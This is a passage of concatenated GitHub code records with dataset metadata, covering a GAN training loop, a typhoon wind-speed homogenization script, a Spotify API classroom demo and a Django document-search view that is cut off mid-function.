1\n else:\n translated = translator.translate(sample[count], dest=\"en\")\n time.sleep(0.15)\n print(translated)\n english.write(translated.text + '\\n')\n english.close()\n count += 1\n\n except Exception as e:\n print(e)\n count += 1\n\n\nf.close()\n", "repo_name": "szabolcs4444/szakdolgozat", "sub_path": "Chatbot/textextract/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2936, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "textextract.linkextract.Try", "line_number": 8, "usage_type": "call"}, {"api_name": "textextract.linkextract.Try", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path", "line_number": 81, "usage_type": "attribute"}, {"api_name": "googletrans.Translator", "line_number": 84, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 95, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 104, "usage_type": "call"}]}
+{"seq_id": "24064770181", "text": "import time\nfrom options.train_options import TrainOptions\nfrom data.data_loader import CreateDataLoader\nfrom models.models import create_model\nfrom util.visualizer import Visualizer\nfrom collections import OrderedDict\nimport torch\nimport os\nfrom eval import Evalulate\n\n\n'''\nTo resolve the multi-threaded problem.\nif __name__ == '__main__':(for all code)\nor just set num_worker=0\n'''\nif __name__ == '__main__':\n ''' 0611 '''\n opt = TrainOptions().parse()\n data_loader = CreateDataLoader(opt)\n # dataset = data_loader.load_data() # only dataset or dataloader (same one)\n dataset_size = len(data_loader)\n print('#training images = %d' % dataset_size)\n\n model = create_model(opt)\n visualizer = Visualizer(opt)\n total_steps = 0\n hist_error = model.get_errors(opt)\n hist_error = dict(sorted(hist_error.items()))\n visualizer.plot_data = {'train': OrderedDict((k, []) for k in hist_error.keys()),\n 'val': OrderedDict((k, []) for k in hist_error.keys()),\n 'legend': list(hist_error.keys())}\n eval = Evalulate(opt) ##valdation 初始化設定\n if opt.continue_train:\n print(\"---------network is continue train------------\")\n p = os.path.join(model.save_dir, \"history.pth\")\n hist = torch.load(p)\n visualizer.plot_data = hist['plot_data']\n visualizer.metric_data = hist['metric']\n ssim_best = 0\n lpips_best = 1\n for epoch in range(opt.epoch_count, opt.niter + opt.niter_decay + 1):\n epoch_start_time = time.time()\n iter_data_time = time.time()\n epoch_iter = 0\n visualizer.data_error = [0 for _ in hist_error.keys()]\n for i, data in enumerate(data_loader.dataloader):\n iter_start_time = time.time()\n if total_steps % opt.print_freq == 0:\n t_data = iter_start_time - iter_data_time\n visualizer.reset()\n total_steps += opt.batchSize\n epoch_iter += opt.batchSize\n if opt.dataset_mode == 'FLIR':\n model.set_input(data)\n elif opt.dataset_mode == 'KAIST':\n model.set_KAIST_input(data)\n model.optimize_parameters(total_steps=total_steps)\n\n # if total_steps % opt.display_freq == 0:\n # save_result = total_steps % opt.update_html_freq == 0\n # visualizer.display_current_results(model.get_current_visuals(), epoch, save_result)\n\n errors = model.get_current_errors()\n visualizer.add_errors(errors)\n if total_steps % opt.print_freq == 0:\n # errors = model.get_current_errors()\n t = (time.time() - iter_start_time) / opt.batchSize\n visualizer.print_current_errors(epoch, epoch_iter, errors, t, t_data, total_steps,\n len(data_loader.dataloader) * opt.batchSize)\n # if opt.display_id > 0:\n # visualizer.plot_current_errors(epoch, float(epoch_iter) / dataset_size, opt, errors)\n\n if total_steps % opt.save_latest_freq == 0:\n print('saving the latest model (epoch %d, total_steps %d)' %\n (epoch, total_steps))\n model.save('latest')\n\n iter_data_time = time.time()\n del data\n if opt.display_id > 0:\n visualizer.append_error_hist(i + 1)\n visualizer.data_error = [0 for _ in hist_error.keys()]\n train_a_path = model.get_image_paths()[0]\n visualizer.display_current_results(model.get_current_visuals(), epoch, True)\n\n ##這裡開始Valdataion\n ssim, lpips = eval.eval(model, visualizer, opt)\n\n # put behind eval (get val images)\n val_a_path = model.get_image_paths()[0]\n visualizer.display_current_results(model.get_current_visuals(), epoch, True, [train_a_path, val_a_path],\n val=True)\n\n ##tensorboard\n visualizer.plot_current_errors(epoch)\n ##tensorbard-evaluation\n visualizer.plot_current_metrics(ssim, lpips, epoch)\n if epoch % opt.save_epoch_freq == 0:\n print('saving the model at the end of epoch %d, iters %d' %\n (epoch, total_steps))\n model.save('latest')\n # TODO: hist only save at every 5 epochs\n hist = {'plot_data': visualizer.plot_data,\n 'metric': visualizer.metric_data}\n p = os.path.join(model.save_dir, \"history.pth\")\n torch.save(hist, p)\n model.save(epoch)\n if ssim > ssim_best:\n ssim_best=ssim\n model.save('ssim_best')\n print('saving the ssim_best model (epoch %d, total_steps %d, ssim %f)' % (epoch, total_steps,ssim))\n if lpips < lpips_best:\n lpips_best=lpips\n model.save('lpips_best')\n print('saving the lpips_best model (epoch %d, total_steps %d, lpips %f)' % (epoch, total_steps, lpips))\n\n print('End of epoch %d / %d \\t Time Taken: %d sec' %\n (epoch, opt.niter + opt.niter_decay, time.time() - epoch_start_time))\n lr = model.update_learning_rate()\n with open(visualizer.log_name, \"a\") as log_file:\n log_file.write('Learning Rate = %f\\n' % lr)\n log_file.write('================End of epoch %d / %d \\t Time Taken: %d sec ================\\n' %\n (epoch, opt.niter + opt.niter_decay, time.time() - epoch_start_time))\n visualizer.train_log_writer.close()\n visualizer.val_log_writer.close()", "repo_name": "Andreas00612/InfraGANV2", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 5686, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "options.train_options.TrainOptions", "line_number": 19, "usage_type": "call"}, {"api_name": "data.data_loader.CreateDataLoader", "line_number": 20, "usage_type": "call"}, {"api_name": "models.models.create_model", "line_number": 25, "usage_type": "call"}, {"api_name": "util.visualizer.Visualizer", "line_number": 26, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 30, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 31, "usage_type": "call"}, {"api_name": "eval.Evalulate", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 37, "usage_type": "call"}, {"api_name": "time.time", "line_number": 43, "usage_type": "call"}, {"api_name": "time.time", "line_number": 44, "usage_type": "call"}, {"api_name": "data.data_loader", "line_number": 47, "usage_type": "name"}, {"api_name": "time.time", "line_number": 48, "usage_type": "call"}, {"api_name": "data.data_loader", "line_number": 55, "usage_type": "argument"}, {"api_name": "data.data_loader", "line_number": 57, "usage_type": "argument"}, {"api_name": "time.time", "line_number": 68, "usage_type": "call"}, {"api_name": "time.time", "line_number": 79, "usage_type": "call"}, {"api_name": "data.data_loader", "line_number": 80, "usage_type": "name"}, {"api_name": "eval.eval", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 107, "usage_type": "call"}, {"api_name": "time.time", "line_number": 119, "usage_type": "call"}, {"api_name": "time.time", "line_number": 124, "usage_type": "call"}]}
+{"seq_id": "14461642420", "text": "from abc import ABC, abstractmethod\nfrom typing import Literal\n\nPaginatedItemsDict = dict[int, list[dict]]\nPlatform = Literal[\"pc\", \"mobile\"]\nSortByDict = dict[str, str | int | bool]\nOrder = Literal[\"asc\", \"desc\"]\n\n\nclass ItemInterface(ABC):\n\n @abstractmethod\n def get_items(self, data: dict[str, any]) -> tuple[PaginatedItemsDict, int]:\n ...\n\n @abstractmethod\n def get_items_manufacturer(self, data: dict) -> dict[list[str]]:\n ...\n\n @abstractmethod\n def get_item(self, data: dict) -> tuple[dict[str, dict], int]:\n ...\n", "repo_name": "Psylo2/pablo_backend_store_api", "sub_path": "application/interfaces/usecases/item/item_interface.py", "file_name": "item_interface.py", "file_ext": "py", "file_size_in_byte": 558, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "typing.Literal", "line_number": 5, "usage_type": "name"}, {"api_name": "typing.Literal", "line_number": 7, "usage_type": "name"}, {"api_name": "abc.ABC", "line_number": 10, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 12, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 16, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 20, "usage_type": "name"}]}
+{"seq_id": "36588450019", "text": "#coding=utf-8\nimport numpy as np\nfrom mpl_toolkits.basemap import Basemap\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport pandas as pd\nimport parameter\nfrom customizeFunction import function as custfunc\nfrom dateutil.parser import parse\nimport datetime\nimport re\nimport time\nfrom decimal import Decimal\nimport math\n\nclass homogenization:\n def __int__(self):\n pass\n def detectHomogen(self,begY,endY,Vmax): #均一性检验\n VmaxO = Vmax[0:endY-begY+1]\n mO = len(VmaxO)\n F = []\n for i in range(5,mO-5): #滑动计算F,掐头去尾5年,避免子序列过短\n X1 = VmaxO[0:i]\n X2 = VmaxO[i:mO]\n iF = self.calcF(X1,X2)\n F.append(iF)\n F = np.array(F)\n Fmax = np.max(F)\n if Fmax>5:\n #print(\"F test Ok\")\n idx = np.argmax(F)\n idx += 5\n homoYear = begY + idx\n return (homoYear,Fmax) #返回突变年\n else:\n return False\n \n def calcF(self,X1,X2):\n n1 = len(X1)\n n2 = len(X2)\n n = n1+n2\n x1Mean = np.mean(X1)\n x2Mean = np.mean(X2)\n x1VarS = np.sum(np.square(X1-x1Mean)) # 方差\n x2VarS = np.sum(np.square(X2-x2Mean))\n arg0 = n1*n2/n\n arg0 = arg0*(x1Mean-x2Mean)**2\n arg1 = x1VarS + x2VarS\n Fvalue = arg0/arg1*(n-2) # F检验\n return Fvalue\n \n def correctVmax(self,iKey,begY,endY,homoYear,Vmax):\n '''\n homoYear-endY之间订正\n begY-homoYear城市化之前、endY-len(Vmax)台站迁移之后不变\n ''' \n n1 = homoYear - begY \n n2 = endY - homoYear+1\n n3 = len(Vmax)-n1-n2\n VmaxB = Vmax[0:n1] # B:Before homoYear\n meanB = np.mean(VmaxB)\n stdB = np.std(VmaxB)\n VmaxA = Vmax[n1:n1+n2] # A:After homoYear(include)\n VmaxU = VmaxA-meanB\n meanU = np.mean(VmaxU)\n stdU = np.std(VmaxU)\n n = []\n m = []\n VmaxC = [] # correct\n for i in range(len(VmaxA)):\n iN = 10.0*np.abs(VmaxA[i]-meanB)/stdB+0.5\n iM = 10.0*(VmaxU[i]-meanU)/stdU+0.5\n iN = int(iN)\n iM = int(iM)\n iVmaxC = VmaxA[i]+ (iN*stdB+iM*stdU)/10.0 # C:Correct\n if np.abs(iVmaxC-meanB)>3*stdB:\n if iVmaxC>meanB:\n iVmaxC = meanB+3*stdB\n else:\n iVmaxC = meanB-3*stdB\n VmaxC.append(iVmaxC)\n VmaxC = np.array(VmaxC)\n VmaxAll = np.append(list(VmaxB),list(VmaxC))\n if n3>0:\n VmaxHE = list(Vmax[n1+n2:len(Vmax)]) # homeYear-endY\n VmaxAll = np.append(VmaxAll,VmaxHE)\n outputFileName = r\"obs_data/\"+iKey+\"_obs_vmax_correct.csv\"\n np.savetxt(outputFileName,VmaxAll, delimiter = ',', fmt='%s') \n return VmaxAll\n\nif __name__ == '__main__':\n # get parameter\n parameter = parameter.SiteInfo()\n allObsInfo = parameter.allObsInfo()\n homo = homogenization()\n fontsize = 14\n myfont = mpl.font_manager.FontProperties(fname=r'./chinese_font/simhei.ttf',size=fontsize)\n plt.figure(figsize=(16, 16))\n fig = plt.gcf()\n plt.rcParams['savefig.dpi'] = 800 #像素\n plt.rcParams['figure.dpi'] = 800 #分辨率\n figNum = 0\n for iKey in allObsInfo.keys(): \n figNum += 1\n ax = plt.subplot(6,2,figNum)\n obsFileName=r\"obs_data/\"+iKey+\"_obs_vmax.csv\"\n print(\"reading from\",obsFileName)\n dataset = pd.read_csv(obsFileName,header=None,sep=',')\n dataset = np.array(dataset)\n m ,n = np.shape(dataset)\n Vmax = dataset[:,0] # wind speed\n begY = allObsInfo[iKey]['begY'] \n endY = allObsInfo[iKey]['endY'] \n begY1 = begY\n endY1 = endY\n iX = range(begY,endY+1)\n plt.plot(iX,Vmax,'ro-',label=u'订正前', linewidth=1)\n if iKey == '59754': #徐闻气象站2003年搬迁\n endY1 = 2003 \n if iKey == '59663': #阳江气象站2004年搬迁\n endY1 = 2003\n if iKey == '58941': #长乐气象站2005年搬迁\n endY1 = 2004\n #if iKey == '58843': #霞浦气象站20017年搬迁\n # endY1 = 2006 \n Ftest = homo.detectHomogen(begY1,endY1,Vmax)\n if Ftest != False:\n print(Ftest[0],Ftest[1])\n homoYear = Ftest[0]\n VmaxC = homo.correctVmax(iKey,begY1,endY1,homoYear,Vmax)\n plt.plot(iX,VmaxC,'bo-',label=u'订正后', linewidth=1)\n VmaxMAX = np.max([np.max(Vmax),np.max(VmaxC)])\n VmaxMin = np.min([np.min(Vmax),np.min(VmaxC)])\n textInfo = u\"订正年份:\"+str(homoYear)+\"-\"+str(endY1)\n plt.text(iX[int(len(iX)/2)],VmaxMAX-1,textInfo,fontproperties=myfont,fontsize=fontsize)\n else:\n print(\"F test failure!!!\")\n VmaxMAX = np.max(Vmax)\n VmaxMin = np.min(Vmax)\n textInfo = u\"未订正\"\n plt.text(iX[int(len(iX)/2)],VmaxMAX-1,textInfo,fontproperties=myfont,fontsize=fontsize)\n plt.ylabel(u'Vmax(m/s)', fontproperties=myfont,fontsize=fontsize) \n plt.xlabel(u'年份', fontproperties=myfont,fontsize=fontsize) \n plt.ylim(VmaxMin-2,VmaxMAX+3)\n plt.legend(loc='upper right', frameon=False, prop=myfont,fontsize=fontsize)\n iStationInfo = iKey+\":\"+allObsInfo[iKey]['name']\n plt.text(iX[0],VmaxMAX-1,iStationInfo,fontproperties=myfont,fontsize=fontsize)\n plt.tight_layout()\n figName = 'allWeatherStationCorrectionObsVmax.png'\n fig.savefig(figName)\n plt.close()\n\n\n\n", "repo_name": "islandowner95/typhoon-risk-final", "sub_path": "typhoonRiskV4p0/homogenization.py", "file_name": "homogenization.py", "file_ext": "py", "file_size_in_byte": 5599, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.array", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 89, "usage_type": "call"}, {"api_name": "parameter.SiteInfo", "line_number": 94, "usage_type": "call"}, {"api_name": "parameter.allObsInfo", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.font_manager.FontProperties", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.font_manager", "line_number": 98, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 101, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 101, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 102, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 132, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 132, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.text", "line_number": 136, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 136, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.text", "line_number": 142, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 142, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 143, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 143, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 144, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 144, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 145, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 145, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 146, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 146, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 148, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 149, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 149, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 152, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 152, "usage_type": "name"}]}
+{"seq_id": "4714838909", "text": "#\nimport os;\nimport torch;\nimport numpy as np;\nimport h5py;\n\ndef cv(h5fname):\n h5f = h5py.File(h5fname,'r');\n label = np.array(h5f['label']);\n pts = np.array(h5f['pts']);\n v = [];\n for i in range(label.shape[0]):\n lbl = label[i,:];\n plst = [];\n for l in range(np.min(lbl),np.max(lbl)):\n p = np.array( pts[i,lbl==l,:] );\n if p.size > 1:\n plst.append(p);\n #\n if len(plst) > 1:\n for pi in range(len(plst)-1):\n for pj in range(pi+1,len(plst)):\n if plst[pi].shape[0] > plst[pj].shape[0]:\n vec = np.mean(plst[pj],axis=0) - np.mean(plst[pi],axis=0);\n else:\n vec = np.mean(plst[pi],axis=0) - np.mean(plst[pj],axis=0);\n v.append(vec);\n X = None;\n if len(v) > 0:\n X = np.stack(v);\n h5f.close();\n return X;", "repo_name": "samhu1989/PON", "sub_path": "util/partrl/cv.py", "file_name": "cv.py", "file_ext": "py", "file_size_in_byte": 930, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "h5py.File", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 30, "usage_type": "call"}]}
+{"seq_id": "9883205937", "text": "import pprint\nimport requests #need to install it from the command line using pip\n\n'''\n1. Prompt the user for a search term \n2. Query the Spotify tracks endpoint for the search term\n3. Print the song name and the artist(s) who wrote it. \n'''\n\nsearch_term = 'Beyonce'\n\n# create query url:\nurl = 'https://www.apitutor.org/spotify/simple/v1/search?type=track&q='\nurl += search_term\n\n# print it:\nprint(url)\n\n# retrieve the data:\nresponse = requests.get(url)\ntracks = response.json()\n\npprint.pprint(tracks) # print all the tracks to the screen", "repo_name": "eecs110/fall2021", "sub_path": "course-files/lectures/lecture22/03_spotify_data.py", "file_name": "03_spotify_data.py", "file_ext": "py", "file_size_in_byte": 538, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "requests.get", "line_number": 20, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 23, "usage_type": "call"}]}
+{"seq_id": "40390208119", "text": "\nfrom django.contrib.auth.decorators import login_required\nfrom django.db import transaction\nfrom django.db import connection\n\nfrom enersectapp.models import *\n\nfrom django.shortcuts import render_to_response\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.template import RequestContext\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.core.urlresolvers import reverse\nfrom django.shortcuts import get_object_or_404, render, redirect,render_to_response\n\nfrom pyPdf import PdfFileWriter, PdfFileReader\nfrom urllib2 import Request, urlopen\nfrom StringIO import StringIO\n\n\nfrom django.views import generic\nfrom django.utils import timezone\nfrom datetime import timedelta\nimport datetime\n\n\nimport random\n\ndef search_tool(request):\n \n the_user = request.user\n \n if not request.user.is_authenticated():\n \n return HttpResponseRedirect(reverse('enersectapp:app_login', args=()))\n \n if len(the_user.groups.filter(name=\"TeamLeaders\")) >0:\n \n user_type = \"TeamLeader\"\n \n elif the_user.is_superuser == True :\n \n user_type = \"superuser\"\n \n else:\n \n user_type = \"user\"\n\n ###COMMON BLOCK### \n \n #word = p.pdf_searchword\n word=\"all\"\n word_amount= \"\"\n word_amount_credit= \"\"\n word_amount_debit= \"\"\n word_companyname=\"\"\n word_date=\"\"\n word_docname=\"\"\n word_id_docname=\"\"\n word_accountnumber=\"\"\n word_movnumber=\"\"\n word_journal=\"\"\n word_s=\"\"\n word_lett=\"\"\n word_id=\"\"\n word_job_directory=\"\"\n word_multipart_filename=\"\"\n corpus_word=\"\"\n filter_word = \"\"\n search_options = \"\"\n records_list=[]\n \n try:\n word_amount = request.POST['search_word_amount']\n except (KeyError):\n \n word_amount = \"\"\n \n try:\n word_amount_credit = request.POST['search_word_amount_credit']\n except (KeyError):\n \n word_amount_credit = \"\"\n \n try:\n word_amount_debit = request.POST['search_word_amount_debit']\n except (KeyError):\n \n word_amount_debit = \"\"\n \n try:\n word_amount = request.POST['search_word_amount']\n except (KeyError):\n \n word_amount = \"\"\n \n \n try:\n word_companyname = request.POST['search_word_companyname']\n except (KeyError):\n \n word_companyname=\"\"\n \n try:\n word_date = request.POST['search_word_date']\n except (KeyError):\n \n word_date=\"\"\n \n try:\n word_doctype = request.POST['search_word_doctype']\n except (KeyError):\n \n word_doctype=\"\"\n \n try:\n word_piecenumber = request.POST['search_word_piecenumber']\n except (KeyError):\n \n word_piecenumber=\"\"\n \n try:\n word_docname = request.POST['search_word_docname']\n except (KeyError):\n \n word_docname=\"\"\n \n try:\n word_id_docname = request.POST['search_word_id_docname']\n except (KeyError):\n \n word_id_docname=\"\"\n \n try:\n word_accountnumber = request.POST['search_word_accountnumber']\n except (KeyError):\n \n word_accountnumber=\"\"\n \n try:\n word_movnumber = request.POST['search_word_movnumber']\n except (KeyError):\n \n word_movnumber=\"\"\n \n try:\n word_journal = request.POST['search_word_journal']\n except (KeyError):\n \n word_journal=\"\"\n \n try:\n word_s = request.POST['search_word_s']\n except (KeyError):\n \n word_s=\"\"\n \n try:\n word_lett = request.POST['search_word_lett']\n except (KeyError):\n \n word_lett=\"\"\n \n try:\n word_id = request.POST['search_word_id']\n except (KeyError):\n \n word_id=\"\"\n \n try:\n word_job_directory = request.POST['search_job_directory']\n except (KeyError):\n \n word_job_directory=\"\"\n \n try:\n word_multipart_filename = request.POST['search_word_multipart_filename']\n except (KeyError):\n \n word_multipart_filename=\"\"\n \n try:\n corpus_word = request.POST['corpus_word']\n except (KeyError):\n \n corpus_word = \"corpus_ocr_records\"\n \n try:\n filter_word = request.POST['filter_word']\n except (KeyError):\n \n filter_word = \"pdf_all\"\n \n try:\n id_assign = request.POST['id_assign']\n except (KeyError):\n \n id_assign = \"none\"\n\n try:\n assign_search_results = request.POST['assign_search_results']\n except (KeyError):\n \n assign_search_results = \"none\"\n \n \n \n try:\n category_fields_order_list = request.POST['category_fields_order_list']\n category_fields_order_list = str(category_fields_order_list)\n \n except (KeyError):\n \n category_fields_order_list = \"\"\n \n \n #word = str(word)\n word_amount= str(word_amount).encode(\"utf8\")\n word_amount_credit= str(word_amount_credit).encode(\"utf8\")\n word_amount_debit= str(word_amount_debit).encode(\"utf8\")\n word_companyname= word_companyname.encode(\"utf8\")\n word_date= str(word_date).encode(\"utf8\")\n word_doctype= str(word_doctype).encode(\"utf8\")\n word_piecenumber= str(word_piecenumber).encode(\"utf8\")\n word_docname= str(word_docname).encode(\"utf8\")\n word_id_docname= str(word_id_docname).encode(\"utf8\")\n word_accountnumber= str(word_accountnumber).encode(\"utf8\")\n word_movnumber= str(word_movnumber).encode(\"utf8\")\n word_journal= str(word_journal).encode(\"utf8\")\n word_s= str(word_s).encode(\"utf8\")\n word_lett= str(word_lett).encode(\"utf8\")\n word_id= str(word_id).encode(\"utf8\")\n word_job_directory= str(word_job_directory).encode(\"utf8\")\n word_multipart_filename= str(word_multipart_filename).encode(\"utf8\")\n filter_word = filter_word.lower() \n corpus_word = corpus_word.lower()\n \n\n \n #DocTypes list for the Menu\n \n types_list = SourceDocType.objects.exclude(name=\"other\").exclude(name=\"recuperation\").exclude(name=\"blank probable\").order_by('name')\n \n #Company Names list for the Menu\n \n companyname_list = CompanyTemplate.objects.all().order_by('companyname_base').values_list('companyname_base',flat=True).distinct()\n \n actual_min_num = 1\n \n try:\n prev_next_results = request.POST['prev_next_results']\n prev_next_results = str(prev_next_results)\n except (KeyError):\n \n prev_next_results = \"\"\n \n try:\n actual_min_num = request.POST['actual_min_num']\n actual_min_num = int(actual_min_num)\n except (KeyError):\n \n actual_min_num = 1\n \n \n\n if(prev_next_results == \"\"):\n actual_min_num = 0\n \n if(prev_next_results == \"Prev\"):\n actual_min_num -= 50\n \n if(prev_next_results == \"Next\"):\n actual_min_num += 50\n \n if(prev_next_results == \"Update\"):\n actual_min_num = actual_min_num\n \n if actual_min_num < 1:\n \n actual_min_num = 1\n \n \n max_num = actual_min_num + 50\n \n \n ###END OF COMMON BLOCK### \n \n #Corpus block\n \n if corpus_word==\"corpus_source_records\":\n \n # If button \"Assign to Group\" is pressed by the superuser or TeamLeader, there is access to this block,\n # which creates a SourcePdfToHandle for the SourcePdf chosen, and assigns it to the company of that user.\n \n if (user_type == \"superuser\" or user_type == \"TeamLeader\") and id_assign !=\"none\":\n \n \n id_assign = int(id_assign)\n \n source = SourcePdf.objects.filter(pk = id_assign)\n \n user_group = the_user.groups.all().exclude(name=\"TeamLeaders\").exclude(name=\"Auditors\").exclude(name=\"TeamAuditors\").exclude(name=\"Arabic\")[0]\n none_user = User.objects.get(username=\"None\")\n \n if len(source):\n \n source = source[0] \n tohandle = SourcePdfToHandle(assignedcompany=user_group,assigneduser=none_user,lot_number=-1)\n tohandle.save()\n source.assigndata.add(tohandle)\n source.save()\n \n \n #Filters block\n \n if filter_word==\"source_assigned\":\n \n records_list = SourcePdf.objects.exclude(assigndata=None)\n \n elif filter_word==\"source_notassigned\":\n \n records_list = SourcePdf.objects.filter(assigndata=None)\n \n else:\n \n filter_word=\"source_all\"\n records_list = SourcePdf.objects.all()\n\n #Making lists to use in the Search of Coincidences\n \n temp_list = records_list\n final_list = SourcePdf.objects.none()\n \n \n #Check which Search Options are covered\n \n\n if len(word_job_directory) != 0:\n isJobdirectory = True\n \n else:\n isJobdirectory = False\n \n if len(word_docname) != 0:\n isDocname = True\n \n else:\n isDocname = False\n \n if len(word_doctype) != 0:\n isDoctype = True\n \n else:\n isDoctype = False\n \n if len(word_multipart_filename) != 0:\n isMultipartfilename = True\n \n else:\n isMultipartfilename = False\n \n if len(word_id_docname) != 0:\n isIdDocname = True\n \n else:\n isIdDocname = False\n \n\n #When at least a word is being searched and there are no Search Options\n \n if word ==\"all\" and isJobdirectory == False and isDocname == False and isDoctype == False and isMultipartfilename == False and isIdDocname == False:\n \n #helper_list = temp_list.filter(ocrrecord_link__Company__icontains=word) | temp_list.filter(ocrrecord_link__Amount__icontains=word) | temp_list.filter(ocrrecord_link__IssueDate__icontains=word)\n\n final_list = records_list\n \n # Unused filters:\n '''no_options_wordlist.filter(sourcedoc_link__filename__icontains=word)| 